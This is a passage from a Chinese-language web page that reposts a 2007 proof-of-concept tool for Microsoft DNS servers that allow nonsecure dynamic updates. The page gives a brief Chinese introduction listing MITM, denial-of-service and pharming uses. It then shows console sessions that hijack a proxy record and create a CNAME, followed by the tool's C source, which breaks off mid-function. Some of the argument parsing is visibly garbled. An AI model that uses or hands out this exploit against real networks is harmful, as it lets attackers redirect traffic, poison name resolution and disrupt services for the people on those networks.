|
在系统设定下,大多数微软DNS服务的每个DNS记录都整合了允许非安全的动态升级的动态目录索引。这项功能能够允许远程用户创建修改和删除DNS记录。
这是基于此的几个攻击说明:
+ MITM 攻击:修改DNS记录。
这种攻击方式是最可靠的,同时也允许我们为许多Windows软件开发自动升级和同时修改二进制数。
+ 服务的拒绝:通过删除修改关键性的DNS记录。
+ Pharm:类似于MITM攻击,可以使许多DNS记录中毒。
DNS爱好者们就是利用那些薄弱的软件设置环节进行对DNS记录的修改。这里有些做过的例子,请大家参考:
D:\DNSfun>ping -n 1 FakeProxy.fooooo.com
Haciendo ping a FakeProxy.fooooo.com [66.6.66.6] con 32 bytes de datos:
D:\DNSfun>dnsfun.exe -s 10.100.1.1 -q proxy.mydomain -u 66.6.66.6
Microsoft Dynamic DNS Updates - Proof of Concept
http://www.514.es - (c) 2007 Andres Tarasco Acu?a
[+] Trying to resolve Host: proxy.mydomain (Dns Server 10.100.1.1)
[+] Host proxy.mydomain resolved as 192.168.1.200
[+] Trying to set ip address of the host proxy.mydomain to 66.6.66.6
[+] Trying Nonsecure Dynamic Update...
[?] Host Updated. Checking...(0)
[+] Host proxy.mydomain resolved as 66.6.66.6
D:\DNSfun>dnsfun.exe -s 10.100.1.1 -cc atarasco.mydomain.com -u www.514.es
Microsoft Dynamic DNS Updates - Proof of Concept
http://www.514.es - (c) 2007 Andres Tarasco Acu?a
[+] Gathering Credentials..
[+] Creating DNS CName Record for atarasco.mydomain.com (www.514.es)
[+] Host Created. Rechecking Record...
[+] Host atarasco.mydomain.com resolved as CNAME www.514.es
这虽然已经不是一个新的漏洞,但是很多人还是没有发现利用它。检查惯用函数,你会发现很多新功能:
*/
#include <stdio.h>
#include <winsock2.h>
#include <Windns.h>
#pragma comment(lib,"Dnsapi.lib")
#pragma comment(lib, "ws2_32.lib")
char TargetDnsServer[256]=""; // -s
char TargetDnsRecord[256]=""; // -q
char NewIpAddress[256]=""; // -i
char DeleteDnsRecord[256]=""; //-d
char CreateDnsRecord[256]="";
WORD CreationType=DNS_TYPE_A;
#define DELETERECORD (DeleteDnsRecord[0]!='\0')
#define UPDATERECORD ( (TargetDnsRecord[0]!='\0') && (NewIpAddress[0]!='\0') )
#define CREATERECORD ( (CreateDnsRecord[0]!='\0') && (NewIpAddress[0]!='\0') )
#define QUERYRECORD (TargetDnsRecord[0]!='\0')
#define _DBG_
#undef _DBG_
void usage(char *argv[]);
DNS_RECORDA *DnsQueryA(char *name,IP4_ARRAY *servers)
{
DNS_STATUS status;
WORD type= DNS_TYPE_ANY;
DWORD fOptions=DNS_QUERY_BYPASS_CACHE | DNS_QUERY_NO_LOCAL_NAME
|DNS_QUERY_NO_HOSTS_FILE | DNS_QUERY_NO_NETBT |
DNS_QUERY_TREAT_AS_FQDN;
PVOID* reserved=NULL;
DNS_RECORDA *records=(PDNS_RECORDA)malloc(sizeof(DNS_RECORDA));
DNS_RECORDA *result;
IN_ADDR ipaddr;
int i;
int count=0;
if (!name) {
return (NULL);
} else {
memset(records,'\0',sizeof(DNS_RECORDA));
status = DnsQuery_A( name, //PCWSTR pszName,
type, //WORD wType,
fOptions, //DWORD fOptions,
servers, //PIP4_ARRAY aipServers,
(DNS_RECORDA**)&records, //PDNS_RECORD* ppQueryResultsSet,
reserved ); //PVOID* pReserved
if (status == ERROR_SUCCESS)
{
fflush(stdout);
result=records;
do {
#ifdef _DBG_
printf("[+] Record %i---\n",count);
count++;
printf("[+] DNS wDataLength %i\n",result->wDataLength);
printf("[+] DNS Flags DW: %x\n",result->Flags.DW);
printf("[+] DNS Flags S.Section: %x\n",result->Flags.S.Section);
printf("[+] DNS Flags S.Delete: %x\n",result->Flags.S.Delete);
printf("[+] DNS Flags S.CharSet: %x\n",result->Flags.S.CharSet);
printf("[+] DNS Flags S.Unused: %x\n",result->Flags.S.Unused);
printf("[+] DNS Flags S.Reserved: %x\n",result->Flags.S.Reserved);
#endif
switch (result->wType) {
case DNS_TYPE_A:
ipaddr.S_un.S_addr = (result->Data.A.IpAddress);
printf("[+] Host %s resolved as %s\n", result->pName,inet_ntoa(ipaddr));
break;
case DNS_TYPE_NS:
printf("[+] Domain %s Dns Servers: %s\n",result->pName,result->Data.Ns.pNameHost);
break;
case DNS_TYPE_CNAME:
printf("[+] Host %s resolved as CNAME %s\n", result->pName,result-
>Data.Cname.pNameHost);
//DnsQueryA(result->Data.Cname.pNameHost,servers);
break;
case DNS_TYPE_SOA:
printf("[+] SOA Information: PrimaryServer: %s\n",result-
>Data.Soa.pNamePrimaryServer);
printf("[+] SOA Information: Administrator: %s\n",result-
>Data.Soa.pNameAdministrator);
printf("[+] SOA Information: SerialNo %x - Refresh %i - retry %i - Expire %
i - DefaultTld %i\n",
result->Data.Soa.dwSerialNo,
result->Data.Soa.dwRefresh,
result->Data.Soa.dwRetry,
result->Data.Soa.dwExpire,
result->Data.Soa.dwDefaultTtl);
break;
case DNS_TYPE_MX:
printf("[+] %s MX Server resolved as %s (Preference %i)\n", result-
>pName,result->Data.Mx.pNameExchange,
result->Data.Mx.wPreference);
break;
case DNS_TYPE_TEXT:
printf("[+] Text: %i bytes\n",result->Data.Txt.dwStringCount); //:?
break;
case DNS_TYPE_SRV:
printf("[+] SRV Record. NameTarget %s ",result->Data.Srv.pNameTarget);
printf("(Priority %i - Port %i - Weigth:
%i)\n",result->Data.Srv.wPriority,result->Data.Srv.wPort,result->Data.Srv.wWeight);
//printf("[+] Resource Pad %i \n",result->Data.Srv.Pad);
break;
default:
printf("[-] DnsQuery returned unknown wtype %x\n",result->wType);
break;
}
result=result->pNext;
} while (result!=NULL);
} else {
if (status==9003) printf("[-] Record not found\n");
else printf("[-] Query Error: %i - %i\n",status,GetLastError());
exit(-1);
}
}
return records;
}
/***********************************************************************************************/
int main(int argc, char *argv[]) {
HANDLE creds;
DNS_RECORDA *result;
DNS_STATUS status;
HANDLE ContextHandle;
DWORD Options=DNS_UPDATE_SECURITY_ON;
PVOID pReserved=NULL;
IN_ADDR ipaddr;
IP4_ARRAY *servers=NULL;
SEC_WINNT_AUTH_IDENTITY_A *Credentials=NULL;
WORD i;
printf(" Microsoft Dynamic DNS Updates - Proof of Concept\n");
printf(" http://www.514.es - (c) 2007 Andres Tarasco Acu?a\n\n");
if (argc==1) usage(argv);
//Init Credentials Struct
Credentials = (SEC_WINNT_AUTH_IDENTITY_A *)malloc(sizeof(SEC_WINNT_AUTH_IDENTITY_A));
memset(Credentials,'\0',sizeof(SEC_WINNT_AUTH_IDENTITY_A));
Credentials->Flags=SEC_WINNT_AUTH_IDENTITY_ANSI;
for(i=1;i<argc;i++) {
if ( (argv[0]=='-') ) {
switch (argv[1]) {
case 's':
case 'S':
strcpy(TargetDnsServer,argv[i+1]);
servers=(PIP4_ARRAY)malloc(sizeof(IP4_ARRAY));
servers->AddrCount=1;
servers->AddrArray[0]=inet_addr(TargetDnsServer);
break;
case 'D':
case 'd':
strcpy(DeleteDnsRecord,argv[i+1]);
break;
case 'q':
case 'Q':
strcpy(TargetDnsRecord,argv[i+1]);
break;
case 'u':
case 'U':
strcpy(NewIpAddress,argv[i+1]);
break;
case 'c':
case 'C':
strcpy(CreateDnsRecord,argv[i+1]);
if (NewIpAddress[0]=='\0') strcpy(NewIpAddress,"127.0.0.1");
if (argv[2]!='\0') {
switch (argv[2]) {
case 'c': CreationType=DNS_TYPE_CNAME;
break;
case 'a': CreationType=DNS_TYPE_A;
break;
}
}
break;
/*
case 'f':
CreateThread( NULL,0,HttpRelayToProxy,(LPVOID) &i,0,&dwThreadId);
break;
case 'au': //Uauthorization serName
Credentials->User=argv[i+1]; Credentials->UserLength=strlen(argv[i+1]);
break;
case 'ap':
Credentials->Password=argv[i+1];Credentials->PasswordLength=strlen(argv
[i+1]); break;
case 'ad':
Credentials->Domain=argv[i+1]; Credentials->DomainLength=strlen(argv[i+1]);
break;
*/
default:
printf("[-] Invalid argument: %s\n",argv);
usage(argv);
break;
[1] [2] 下一页 |
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) 
